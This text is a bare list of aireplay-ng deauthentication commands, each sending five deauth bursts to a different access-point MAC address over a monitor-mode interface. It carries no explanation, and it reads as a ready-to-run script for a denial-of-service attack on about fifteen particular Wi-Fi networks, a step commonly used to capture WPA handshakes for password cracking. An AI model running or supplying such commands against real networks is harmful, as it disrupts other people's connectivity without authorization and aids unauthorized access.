aireplay-ng -0 5 -a 5E:87:9C:50:35:9D wlan0mon
aireplay-ng -0 5 -a 80:12:DF:33:A0:02 wlan0mon
aireplay-ng -0 5 -a8C:78:D7:BF:17:90 wlan0mon
aireplay-ng -0 5 -aFC:7C:02:9B:13:FF wlan0mon 对

aireplay-ng -0 5 -a28:6C:07:D4:CB:29 wlan0mon
aireplay-ng -0 5 -a2C:55:7C:B8:4B:E2 wlan0mon
aireplay-ng -0 5 -a74:05:A5:C0:E4:2E wlan0mon
aireplay-ng -0 5 -a3C:E3:E7:EB:AC:24 wlan0mon
aireplay-ng -0 5 -aC0:98:DA:B6:83:0E wlan0mon
aireplay-ng -0 5 -aA8:41:22:C9:73:40 wlan0mon
aireplay-ng -0 5 -aB8:27:C5:A0:39:1C wlan0mon
aireplay-ng -0 5 -aB8:F8:83:4E:A7:20 wlan0mon
aireplay-ng -0 5 -aC8:3A:35:CE:25:C0 wlan0mon
aireplay-ng -0 5 -a48:0E:EC:69:07:E2 wlan0mon
aireplay-ng -0 5 -aDC:72:9B:62:30:60 wlan0mon
